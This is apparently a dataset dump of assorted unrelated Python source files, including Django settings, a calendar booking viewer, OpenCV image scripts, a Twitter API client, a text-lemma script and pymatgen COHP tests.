bit.ly credentials for shortening job urls.\n\nBITLY_USERNAME = get_env_variable('BITLY_USERNAME')\nBITLY_PASSWORD = get_env_variable('BITLY_PASSWORD')\n\nGA_USERNAME = get_env_variable('GA_USERNAME')\nGA_PASSWORD = get_env_variable('GA_PASSWORD')\nGA_PROFILE_ID = get_env_variable('GA_PROFILE_ID')\n\n# Email account to pop for new job emails, and sending out new emails.\n\nEMAIL_HOST = 'pop.gmail.com'\nEMAIL_PORT = 587\nEMAIL_POP_PORT = 995\nEMAIL_HOST_USER = 'jobs4lib@gmail.com'\nEMAIL_HOST_PASSWORD = get_env_variable('EMAIL_HOST_PASSWORD')\nEMAIL_USE_TLS = True\nEMAIL_ANNOUNCE = ['you@example.com', 'me@example.com']\n\n###############################################################################\n#\n# Nose settings\n#\n###############################################################################\n\nINSTALLED_APPS += ('django_nose',) # must come after south\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nNOSE_ARGS = [\n '--with-coverage',\n '--cover-package=jobs',\n '--nocapture',\n '--nologcapture',\n '--logging-format=%(module)s %(levelname)s %(lineno)s: %(message)s',\n ]\n\n\n","sub_path":"settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"354527355","text":"import datetime\nfrom datetime import timedelta\nfrom datetime import datetime as dt\nimport colours\n\nn=0\n\ndef view_booking(service, email):\n global n\n '''\n Patient will be able to view all their bookings\n PARAMS : the service instance\n '''\n now = datetime.datetime.utcnow()\n now = now.isoformat() + 'Z'\n page_token = None\n while True:\n events = service.events().list(calendarId='primary',\n 
timeMin=now,pageToken=page_token).execute()\n\n\n for event in events['items']:\n try:\n # Dictionary Unpacking with variables\n summary = event['summary']\n summary = colours.colour(summary,\"green\")\n event_creator = event['creator']\n creator = event['attendees'][0]['email']\n creator = colours.colour(creator,\"yellow\")\n id_user = event['id']\n id_user = colours.colour(id_user,\"cyan\")\n\n #code for making a suitable time output\n start = event['start'].get('dateTime')\n start = start.split('T')\n date = start[0]\n time = start[1].split('+')\n time = time[0]\n time = dt.strptime(time, '%H:%M:%S')\n end_t = time + timedelta(minutes=30)\n time, end_t = str(time), str(end_t)\n time, end_t = time.split(\" \"), end_t.split(\" \")\n time, end_t = time[1], end_t[1]\n\n #Output of the Date\n if len(event['attendees']) == 2:\n patient_email = event['attendees'][1][\"email\"]\n if patient_email == email:\n n+=1\n print(summary.strip(), 'by', event['attendees'][0]['email'],\"\\n\", date, '', time\n ,'-',end_t,'\\n', \"To cancel the session run:\\n\"\n ,f\"python3 code_clinic.py cancel{id_user}\",'\\n','-'*70)\n except KeyError:\n break\n\n page_token = events.get('nextPageToken')\n if not page_token:\n break\n if n < 1:\n final_string = \"You have no booked slots\\n\"\n print(final_string)\n return(final_string)\n if n == 1:\n final_string = f\"\\nYou have {n} booked slot\\n\"\n print(final_string)\n return(final_string)\n\n else:\n final_string = f\"\\nYou have {n} booked slots\\n\"\n print(final_string)\n return(final_string)\n ","sub_path":"patient/view_booking.py","file_name":"view_booking.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"537666314","text":"import sys\nimport nltk\nimport docopt\nfrom lispat_app.lispat.utils.logger import Logger\nfrom lispat_app.lispat.utils.colors import bcolors\nfrom lispat_app.lispat.base.manager import CommandManager\n\n\nlogger = Logger(\"Main\")\n\nnltk.download('stopwords')\nnltk.download('punkt')\n\ndef app_main(args, manager, file=None):\n \"\"\"\n Summary: Main function handles arguments and hands them off to the manager.\n param: args: arguments for function calls\n :return: exit code\n \"\"\"\n try:\n if args['convert'] and args['--docA'] and args['--docB']:\n docA_path = args['--docA']\n docB_path = args['--docB']\n manager.create_path(docA_path, docB_path)\n return manager.convert()\n\n if args['filter']:\n manager.filter()\n\n if args['data']:\n manager.set_json()\n data = manager.get_json()\n return data\n\n if args['graph']:\n manager.graph()\n\n if args['all']:\n doc_path = file\n manager.create_path(file)\n manager.convert()\n manager.filter()\n manager.set_json()\n\n if args['clean']:\n manager.clean()\n\n except KeyboardInterrupt:\n logger.getLogger().error(bcolors.FAIL + \"Keyboard interrupt. 
Exiting\"\n + bcolors.ENDC)\n sys.exit(1)\n\n\n### DEPRECATED ##################################\n# if args['analytics'] and args['--path']:\n# user_path = args['--path']\n# manager.create_path(user_path)\n# manager.run_analytics(args)\n#\n# if args['compare'] and args['--standard'] and args['--submission']:\n# std_path = args['--standard']\n# sub_path = args['--submission']\n#\n# manager.create_path(std_path, sub_path)\n#\n# html_file = manager.run_sub_vs_std(args)\n# #return html_file\n#\n# if args['compare'] and args['input'] and args['--standard']:\n# print(args['--text'])\n# std_path = args['--standard']\n# print(std_path)\n# manager.create_path(std_path)\n# manager.run_sub_vs_txt(args)\n#\n\n\n\nif __name__ == '__main__':\n app_main(sys.argv)\n","sub_path":"lispat_app/lispat/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"72516483","text":"from SimpleCV import Camera, Display, Image\n#import numpy as N\n#import sklearn as sk\nfrom sklearn import *\n#from scipy.sparse import *\n#from scipy import *\nfrom matplotlib import pylab\n\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#from sklearn.utils.validation import check_arrays\n#from skimage import data\n#from skimage import filters # \n\n\n\n\nc = Camera()\n\ndef foto(c):\n img = c.getImage()\n img.show()\n return img\n\n\n#a=foto(c)\n\n\na=Image(\"hola5Gray.png\")\nimgGray=a\n##imgGray=a.grayscale()\n#imgGray.save(\"hola42AGray.png\")\n#a.save(\"holaA42.png\")\n\ndef histograma(hist):\n \n hist=hist.histogram(255)\n## hist.save(\"hola4Hist.txt\")\n pylab.plot(hist)\n pylab.draw()\n pylab.pause(0.0001)\n\n\n##b=histograma(imgGray)\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('hola5Gray.png',0)\nimg = cv2.medianBlur(img,5)\n\nret,th1 = cv2.threshold(img,60,255,cv2.THRESH_BINARY)\nth2 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,\\\n cv2.THRESH_BINARY,11,2)\nth3 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv2.THRESH_BINARY,11,2)\n\ntitles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']\nimages = [img, th1, th2, th3]\n\nfor i in xrange(4):\n plt.subplot(2,2,i+1),plt.imshow(images[i],'gray')\n plt.title(titles[i])\n plt.xticks([]),plt.yticks([])\nplt.show()\n\n\n\n\n\n","sub_path":"cosa8.py","file_name":"cosa8.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"242928925","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# twitter_app.py\n# \n# Copyright 2016 Keliomer <keliomer@gmail.com>\n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nimport requests, requests_oauthlib, sys, csv, json\n\nwith open('credentials.csv') as creds:\n reader = csv.DictReader(creds)\n for row in reader:\n consumer_key = row['API Key']\n consumer_secret = row['API Secret']\n access_token = row['Access Token']\n access_secret = row['Token Secret']\n\ndef init_auth():\n auth_obj = requests_oauthlib.OAuth1(\n consumer_key, consumer_secret,\n access_token, access_secret)\n \n if verify_credentials(auth_obj):\n print('Validation Complete')\n return auth_obj\n else:\n print('HALT WHO GOES THERE')\n sys.exit(1)\ndef verify_credentials(auth_obj):\n url = 'https://api.twitter.com/1.1/'\\\n 'account/verify_credentials.json'\n response = requests.get(url, auth=auth_obj)\n return response.status_code == 200\n \ndef get_mentions(since_id, auth_obj):\n params = {'count': 200, 'since_id': since_id,\n 'include_rts': 0, 'include_entities': 'false'}\n url = 'https://api.twitter.com/1.1/' \\\n 'statuses/mentions_timeline.json'\n response = requests.get(url,params=params,auth=auth_obj)\n response.raise_for_status()\n return json.loads(response.text)\n \n\nif __name__ == '__main__':\n auth_obj = init_auth()\n since_id = 1\n for tweet in get_mentions(since_id, auth_obj):\n print(tweet['text'])\n \n\n","sub_path":"twitter_app.py","file_name":"twitter_app.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"243277646","text":"#!/usr/bin/env python\nfrom sakura.daemon.processing.operator import InternalOperator\nfrom .stream import FragmentSourceStream\n\n# This internal operator (not accessible from users)\n# is used when a user links 2 operators running in\n# 2 differents daemons. 
As a result, each daemon\n# is running a fragment of the workflow, and the\n# hub, together with this operator, passes the data\n# between these fragments.\n# The FragmentSourceOperator is internally added as\n# a source of the 2nd workflow fragment.\n# It pulls data from the hub (and the hub pulls data\n# from the output of the 1st fragment) and passes this\n# data to the next operator of the 2nd fragment.\n\nFRAGMENT_BUFFER = 1000\n\nclass FragmentSourceOperator(InternalOperator):\n def __init__(self, hub, remote_op_id, remote_out_id):\n super().__init__()\n remote_op = hub.context.op_instances[remote_op_id]\n self.remote_out_stream = remote_op.output_streams[remote_out_id]\n def construct(self):\n # just one output, copy info from remote stream\n self.output_stream = self.register_output(\n FragmentSourceStream(self.remote_out_stream))\n","sub_path":"sakura/operators/internal/fragmentsource/operator.py","file_name":"operator.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"440780331","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, re\nfrom collections import Counter\nimport pymorphy2\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\n\ndef read_from_file(name): #функция, которая читает текст из файла\n file = open(name, 'r', encoding='utf-8')\n text = file.read()\n file.close()\n return text\n\ndef get_words(text): #функция, которая создает и возвращает список слов из текста\n return [word.lower() for word in re.findall(r'[а-яёА-ЯЁa-zA-Z-]+', text) if word[0] != '-']\n\ndef o_lemma_list(s): #функция, которая создает из списка слов список лемм, где ровно 2 \"о\", и преобразует его в удобный вид для записи в .txt\n wordlist = get_words(s)\n morph = pymorphy2.MorphAnalyzer()\n lemmlist = []\n for w in wordlist:\n lemma = morph.parse(w)[0].normal_form\n if len(re.findall('о', lemma)) == 2:\n lemmlist.append(lemma)\n return '\\n'.join(lemmlist)\n\ndef json_file_content(link): #функция, которая скачивает текст с web-страницы, делит его на слова, создает частотный словарь и записывает его в .json\n text = BeautifulSoup(requests.get(link).text, \"html.parser\").getText()\n wordlist = get_words(text)\n freqdict = Counter(wordlist)\n json_data = json.dumps(freqdict, ensure_ascii=False)\n return json_data\n\ndef write_to_file(name, s, filetype): #функция, которая записывает переданные ей данные в файл заданного формата\n file = open(name + filetype, 'w')\n file.write(s)\n file.close()\n\ndef main():\n wdir = input('Рабочая директория> ')\n os.chdir(wdir)\n name = input('Имя файла (без расширения)> ')\n text = read_from_file(name + '.txt')\n\n write_to_file(name+'_lemms', o_lemma_list(text), '.txt')\n print('Cписок лемм создан')\n\n link = 'http://lib.ru/POEZIQ/PESSOA/lirika.txt'\n\n write_to_file(name+'_json', json_file_content(link), '.json')\n print('JSON-словарь создан')\n\nmain()\n","sub_path":"balueva-2.py","file_name":"balueva-2.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207518547","text":"import logging\r\n\r\nfrom sawtooth_sdk.processor.exceptions import InvalidTransaction, InternalError\r\nfrom sawtooth_sdk.processor.handler import TransactionHandler\r\nfrom sawtooth_sdk.protobuf.processor_pb2 import TpProcessRequest\r\n\r\nfrom ApproveState import ApproveState\r\nfrom CaPayload import CaPayload\r\nfrom CaState import CaState\r\n\r\nLOGGER = 
logging.getLogger(__name__)\r\n\r\n\r\nclass CAHandler(TransactionHandler):\r\n\r\n def __init__(self, namespace_prefix):\r\n self._namespace_prefix = namespace_prefix\r\n\r\n @property\r\n def family_name(self):\r\n return 'CA'\r\n\r\n @property\r\n def namespaces(self):\r\n return [self._namespace_prefix]\r\n\r\n @property\r\n def family_versions(self):\r\n return ['1.0']\r\n\r\n def apply(self, transaction: TpProcessRequest, context):\r\n LOGGER.debug('[apply] init header and signer')\r\n header = transaction.header\r\n signer = header.signer_public_key\r\n try:\r\n LOGGER.debug('[apply] create CaState, ApproveState, CaPayload')\r\n state = CaState(context=context, namespace=self._namespace_prefix, timeout=2)\r\n astate = ApproveState(context=context, namespace=self._namespace_prefix, timeout=2)\r\n # state.check_CA_cert()\r\n payload = CaPayload(payload=transaction.payload)\r\n\r\n if payload.action == 'init':\r\n state.init_CA_cert(date=payload.date,\r\n nonce=int(header.nonce, 0),\r\n spkey=payload.value,\r\n csr=payload.csr,\r\n signer=signer)\r\n elif payload.action == 'create':\r\n astate.add_csr_request(date=payload.date, nonce=int(header.nonce, 0), csr=payload.value, signer=signer)\r\n elif payload.action == 'list_approve':\r\n if state.admin == signer:\r\n t_bytes = astate.get_list().encode()\r\n event_name = \"{}/list_approve\".format(self._namespace_prefix)\r\n self._fire_event(context, event_name, {}, t_bytes)\r\n elif payload.action == 'list_my':\r\n lc = astate.get_my_certificate(signer).encode()\r\n event_name = \"{}/list_my\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"signer\": \"{}\".format(signer)}.items(),\r\n lc)\r\n elif payload.action == 'approve':\r\n if state.admin == signer:\r\n d, n, c = astate.approve(payload.serial)\r\n cert_bytes, cert_serial = state.create_certificate(date=d, nonce=n, csr=c)\r\n astate.save_certificate(payload.serial, cert_serial)\r\n\r\n elif payload.action == 'get':\r\n cert_bytes = state.get_certificate(payload.serial)\r\n event_name = \"{}/get\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"serial\": \"{}\".format(payload.serial)}.items(),\r\n cert_bytes)\r\n elif payload.action == 'revoke':\r\n state.revoke_certificate(payload.serial)\r\n event_name = \"{}/revoke\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"serial\": \"{}\".format(payload.serial)}.items())\r\n elif payload.action == 'status':\r\n status = state.check_status(payload.serial)\r\n event_name = \"{}/status\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"serial\": \"{}\".format(payload.serial)}.items(),\r\n status.encode('utf-8'))\r\n else:\r\n raise InvalidTransaction(\"Transaction payload type unknown.\")\r\n except InternalError as er:\r\n raise InvalidTransaction(str(er)) from er\r\n except BaseException as ex:\r\n raise InvalidTransaction(str(ex)) from ex\r\n\r\n def _fire_event(self, context, event_name, filters, data=None):\r\n LOGGER.debug(\"fire event \" + event_name)\r\n context.add_event(event_name,\r\n filters,\r\n data)\r\n LOGGER.debug(\"event {} fired\".format(event_name))\r\n\r\ndef _display(msg):\r\n n = msg.count(\"\\n\")\r\n\r\n if n > 0:\r\n msg = msg.split(\"\\n\")\r\n length = max(len(line) for line in msg)\r\n else:\r\n length = len(msg)\r\n msg = [msg]\r\n\r\n LOGGER.debug(\"+\" + (length + 2) * \"-\" + \"+\")\r\n for line in msg:\r\n LOGGER.debug(\"+ \" + line.center(length) + \" +\")\r\n 
LOGGER.debug(\"+\" + (length + 2) * \"-\" + \"+\")\r\n","sub_path":"docker/bchainca-tp/bchainca/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"561255466","text":"\"\"\"\nWebcam Sketch\n\nHaving fun generating a line drawing of the live webcam. Requires a webcam (obviously), and OpenCV. Python 3\n\"\"\"\nimport cv2\nimport numpy as np\n\n# Our sketch generating function\ndef sketch(image):\n    # Convert image to grayscale\n    img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    \n    # Clean up image using Gaussian Blur\n    img_gray_blur = cv2.GaussianBlur(img_gray, (5,5), 0)\n    \n    # Extract edges\n    canny_edges = cv2.Canny(img_gray_blur, 10, 90)\n    \n    kernel = np.ones((3,3), np.uint8)\n    dilation = cv2.dilate(canny_edges, kernel, iterations = 1)\n    \n    # Invert and binarize the image \n    mask = cv2.bitwise_not(dilation)\n    mask = cv2.bitwise_or(mask, img_gray) # adds an interesting gray effect\n    return mask\n\n\n# Initialize webcam, cap is the object provided by VideoCapture\n# It contains a boolean indicating if it was successful (ret)\n# It also contains the images collected from the webcam (frame)\ncap = cv2.VideoCapture(0)\n\nprint('Press Enter to exit')\nwhile True:\n    try:\n        ret, frame = cap.read()\n        cv2.imshow('Our Live Sketcher', sketch(frame))\n        if cv2.waitKey(1) == 13: #13 is the Enter Key\n            break\n    except:\n        # Release camera and close windows\n        cap.release()\n        cv2.destroyAllWindows()\n\n# Release camera and close windows\ncap.release()\ncv2.destroyAllWindows()","sub_path":"webcam_sketch.py","file_name":"webcam_sketch.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"29542882","text":"from collections import deque\n\ndef earliest_ancestor(ancestors, starting_node):\n    # reverse the tuples direction of edges for ancestors\n    # so you can traverse only to older generations\n    lis = [tup[::-1] for tup in ancestors]\n\n    # create the directed graph\n    graph = {}\n    for tup in lis:\n        if tup[0] in graph:\n            graph[tup[0]].add(tup[1])\n        else:\n            graph[tup[0]] = {tup[1]}\n        if tup[1] in graph:\n            continue\n        else:\n            graph[tup[1]] = set()\n\n    # do a depth first traversal for the starting node\n    stack = deque([[starting_node]])\n    visited = set()\n    # keep track of the longest traversal/path, or earliest ancestor path\n    longest_path = []\n    while len(stack)>0:\n        path = stack.pop()\n        v = path[-1]\n        if v not in visited:\n            visited.add(v)\n            # check if has no ancestors\n            if not graph[v]:\n                if len(path) > len(longest_path):\n                    longest_path = path\n                elif len(path) == len(longest_path) and path[-1] < longest_path[-1]:\n                    # on a distance tie, prefer the lower ancestor id\n                    longest_path = path\n            for n in graph[v]:\n                stack.append(path + [n])\n\n    # return the earliest ancestor or -1 if starting node doesn't have any ancestors\n    ancestor = longest_path[-1]\n    return -1 if ancestor==starting_node else ancestor\n\n\ntest = [(1, 3), (2, 3), (3, 6), (5, 6), (5, 7), (4, 5), (4, 8), (8, 9), (11, 8), (10, 1)]\nprint(earliest_ancestor(test, 2))","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"397108174","text":"\n\nfrom xai.brain.wordbase.nouns._neophyte import _NEOPHYTE\n\n#class header\nclass _NEOPHYTES(_NEOPHYTE, ):\n\tdef __init__(self,): \n\t\t_NEOPHYTE.__init__(self)\n\t\tself.name = 
\"NEOPHYTES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"neophyte\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_neophytes.py","file_name":"_neophytes.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"202648582","text":"from .base_agent import BaseAgent\n\n\nclass UserAgent(BaseAgent):\n '''Human Agent'''\n\n def __init__(self, game_id, player):\n super().__init__(game_id, player)\n\n def get_state(self):\n '''Gets current board state'''\n if self.game_over:\n return {'end': True}\n data = self.request('GET', f'/v1.0/games/{ self.game_id }')\n return data['state']\n\n def play_round(self, move):\n if move is None:\n return\n proposal = self.get_state()\n if isinstance(proposal, dict):\n return\n proposal = list(map(list, map(bytes.fromhex, proposal)))\n proposal[move[1][0]][move[1][1]] = proposal[move[0][0]][move[0][1]]\n proposal[move[0][0]][move[0][1]] = 0\n return self.put_board(tuple(map(bytes, proposal)))\n","sub_path":"neuralknight/models/user_agent.py","file_name":"user_agent.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"417607613","text":"# https://bigocoder.com/courses/OBLUE01/OBLUE01_LEC18/BLUE_L18P03_2\n\ndef findSet(u):\n if parent[u] != u:\n parent[u] = findSet(parent[u])\n return parent[u]\n\ndef unionSet(u,v):\n up = findSet(u)\n vp = findSet(v)\n if up == vp:\n return\n if rank[up] > rank[vp]:\n parent[vp] = up\n elif rank[up] < rank[vp]:\n parent[up] = vp\n else:\n parent[up] = vp\n rank[vp] += 1\n\ncase = 1\n\nwhile True:\n n,m = map(int, input().split())\n\n if n == 0 and m == 0:\n break\n\n rank = [0 for i in range(n)]\n parent = [i for i in range(n)]\n\n for i in range(m):\n p1,p2 = map(int, input().split())\n unionSet(p1-1, p2-1)\n \n group = [0 for i in range(n)]\n\n for i in range(n):\n group[findSet(i)] += 1\n \n count = 0\n for i in range(n):\n if group[i]:\n count += 1\n print('Case ' + str(case) + ': ' + str(count))\n case += 1","sub_path":"BigO/Blue/Lecture18_FinalExam/UbiquitousReligions.py","file_name":"UbiquitousReligions.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"563489409","text":"from fastapi import HTTPException\n\n\nclass BadRequest(HTTPException):\n \"\"\"400 Bad Request\"\"\"\n\n def __init__(\n self,\n status_code: int = 400,\n detail: str = None,\n headers: dict = None,\n title: str = \"Bad Request\",\n ) -> None:\n super().__init__(status_code=status_code, detail=detail, headers=headers)\n self.title = title\n","sub_path":"optimade/server/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"377951682","text":"import argparse\n\nfrom meipai.api import MeiPai\nfrom .cache import get_last_page\nfrom .player import Player\n\n__author__ = 'PyBeaner'\n\n\ndef play(query, videos=None):\n videos = videos if videos else MeiPai().search(query)\n all_played = True\n for video in videos:\n if not Player.played(video):\n Player.play(video)\n all_played = False\n break\n if all_played:\n print('正在加载视频数据')\n videos = MeiPai().search(query, page=get_last_page(query, 'mv') + 1)\n if not videos:\n print(\"没有更多关于\" + query + \"的视频了\")\n return\n return play(query, videos)\n\n\ndef start():\n parser = 
argparse.ArgumentParser()\n parser.add_argument('query')\n parser.add_argument('--topic', action='store_true', help='搜索话题')\n args = parser.parse_args()\n query = args.query\n if args.topic:\n query = '#' + query + '#'\n\n play(query)\n\n\nif __name__ == '__main__':\n start()\n\n # topic_names = api.search('萌宠', 'topic')\n # print(topic_names)\n # topic = Topic(random.choice(topic_names))\n # print(topic.name, topic.topic_id)\n","sub_path":"meipai/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"642626489","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\nfrom __future__ import division, unicode_literals\nimport unittest\nimport json\nimport os\nfrom pymatgen.electronic_structure.cohp import CompleteCohp, Cohp\nfrom pymatgen.electronic_structure.core import Spin\nfrom pymatgen.util.testing import PymatgenTest\n\ntest_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\",\n \"test_files\", \"cohp\")\n\n\nclass CohpTest(unittest.TestCase):\n def setUp(self):\n with open(os.path.join(test_dir, \"cohp.json\"), \"r\") as f:\n self.cohp = Cohp.from_dict(json.load(f))\n self.cohp_only = Cohp(self.cohp.efermi,\n self.cohp.energies,\n self.cohp.cohp)\n with open(os.path.join(test_dir, \"coop.json\"), \"r\") as f:\n self.coop = Cohp.from_dict(json.load(f))\n\n def test_as_from_dict(self):\n with open(os.path.join(test_dir, \"cohp.json\"), \"r\") as f:\n cohp_dict = json.load(f)\n self.assertEqual(self.cohp.as_dict(), cohp_dict)\n\n def test_attributes(self):\n self.assertEqual(len(self.cohp.energies), 301)\n self.assertEqual(self.cohp.efermi, 9.75576)\n self.assertEqual(self.coop.efermi, 5.90043)\n self.assertFalse(self.cohp.are_coops)\n self.assertTrue(self.coop.are_coops)\n\n def test_get_icohp(self):\n self.assertEqual(self.cohp.get_icohp(),\n self.cohp.get_cohp(integrated=True))\n self.assertEqual(None, self.cohp_only.get_icohp())\n\n def test_get_interpolated_value(self):\n # icohp_ef are the ICHOP(Ef) values taken from\n # the ICOHPLIST.lobster file.\n icohp_ef_dict = {Spin.up: -0.10218, Spin.down: -0.19701}\n icoop_ef_dict = {Spin.up: 0.24714}\n icohp_ef = self.cohp.get_interpolated_value(self.cohp.efermi,\n integrated=True)\n icoop_ef = self.coop.get_interpolated_value(self.coop.efermi,\n integrated=True)\n self.assertAlmostEqual(icohp_ef_dict, icohp_ef)\n self.assertAlmostEqual(icoop_ef_dict, icoop_ef)\n with self.assertRaises(ValueError):\n self.cohp_only.get_interpolated_value(5.0, integrated=True)\n\n def test_str(self):\n with open(os.path.join(test_dir, \"cohp.str\"), \"rt\") as f:\n str_cohp = f.read()\n with open(os.path.join(test_dir, \"coop.str\"), \"rt\") as f:\n str_coop = f.read()\n self.assertEqual(self.cohp.__str__(), str_cohp)\n self.assertEqual(self.coop.__str__(), str_coop)\n\n\nclass CompleteCohpTest(PymatgenTest):\n def setUp(self):\n filepath = os.path.join(test_dir, \"complete_cohp_lobster.json\")\n with open(filepath, \"r\") as f:\n self.cohp_lobster_dict = CompleteCohp.from_dict(json.load(f))\n filepath = os.path.join(test_dir, \"complete_coop_lobster.json\")\n with open(filepath, \"r\") as f:\n self.coop_lobster_dict = CompleteCohp.from_dict(json.load(f))\n filepath = os.path.join(test_dir, \"complete_cohp_lmto.json\")\n with open(filepath, \"r\") as f:\n self.cohp_lmto_dict = CompleteCohp.from_dict(json.load(f))\n\n filepath = 
os.path.join(test_dir, \"COPL.BiSe\")\n structure = os.path.join(test_dir, \"CTRL.BiSe\")\n self.cohp_lmto = CompleteCohp.from_file(\"lmto\", filename=filepath,\n structure_file=structure)\n filepath = os.path.join(test_dir, \"COHPCAR.lobster\")\n structure = os.path.join(test_dir, \"POSCAR\")\n self.cohp_lobster = CompleteCohp.from_file(\"lobster\",\n filename=filepath,\n structure_file=structure)\n filepath = os.path.join(test_dir, \"COOPCAR.lobster.BiSe\")\n structure = os.path.join(test_dir, \"POSCAR.BiSe\")\n self.coop_lobster = CompleteCohp.from_file(\"lobster\",\n filename=filepath,\n structure_file=structure,\n are_coops=True)\n\n def test_attiributes(self):\n self.assertFalse(self.cohp_lobster.are_coops)\n self.assertFalse(self.cohp_lobster_dict.are_coops)\n self.assertFalse(self.cohp_lmto.are_coops)\n self.assertFalse(self.cohp_lmto_dict.are_coops)\n self.assertTrue(self.coop_lobster.are_coops)\n self.assertTrue(self.coop_lobster_dict.are_coops)\n self.assertEqual(len(self.cohp_lobster.energies), 301)\n self.assertEqual(len(self.cohp_lmto.energies), 801)\n self.assertEqual(len(self.coop_lobster.energies), 241)\n self.assertEqual(self.cohp_lobster.efermi, 9.75576)\n self.assertEqual(self.cohp_lmto.efermi, -2.3433)\n self.assertEqual(self.coop_lobster.efermi, 5.90043)\n\n def test_dict(self):\n # The json files are dict representations of the COHPs from the LMTO\n # and LOBSTER calculations and should thus be the same.\n\n self.assertEqual(self.cohp_lobster.as_dict(),\n self.cohp_lobster_dict.as_dict())\n\n # Testing the LMTO dicts will be more involved. Since the average\n # is calculated and not read, there may be differences in rounding\n # with a very small number of matrix elements, which would cause the\n # test to fail\n for key in [\"COHP\", \"ICOHP\"]:\n self.assertArrayAlmostEqual(\n self.cohp_lmto.as_dict()[key][\"average\"][\"1\"],\n self.cohp_lmto_dict.as_dict()[key][\"average\"][\"1\"], 5)\n for key in self.cohp_lmto.as_dict():\n if key not in [\"COHP\", \"ICOHP\"]:\n self.assertEqual(self.cohp_lmto.as_dict()[key],\n self.cohp_lmto_dict.as_dict()[key])\n else:\n for bond in self.cohp_lmto.as_dict()[key]:\n if bond != \"average\":\n self.assertEqual(self.cohp_lmto.as_dict()[key][bond],\n self.cohp_lmto_dict.as_dict()[key][bond])\n\n def test_icohp_values(self):\n # icohp_ef are the ICHOP(Ef) values taken from\n # the ICOHPLIST.lobster file.\n icohp_ef_dict = {\"Fe8-Fe7\": {Spin.up: -0.10218, Spin.down: -0.19701},\n \"Fe8-Fe9\": {Spin.up: -0.28485, Spin.down: -0.58279}}\n all_cohps_lobster = self.cohp_lobster.all_cohps\n for bond in icohp_ef_dict:\n icohp_ef = all_cohps_lobster[bond].get_interpolated_value(\n self.cohp_lobster.efermi, integrated=True)\n self.assertEqual(icohp_ef_dict[bond], icohp_ef)\n\n icoop_ef_dict = {\"Bi1-Se7\": {Spin.up: 0.14245},\n \"Bi1-Se10\": {Spin.up: -0.04118},\n \"Bi2-Se8\": {Spin.up: 0.14245},\n \"Bi2-Se9\": {Spin.up: -0.04118},\n \"Bi3-Se10\": {Spin.up: -0.03516},\n \"Bi3-Se11\": {Spin.up: 0.10745},\n \"Bi4-Se9\": {Spin.up: -0.03516},\n \"Bi4-Se12\": 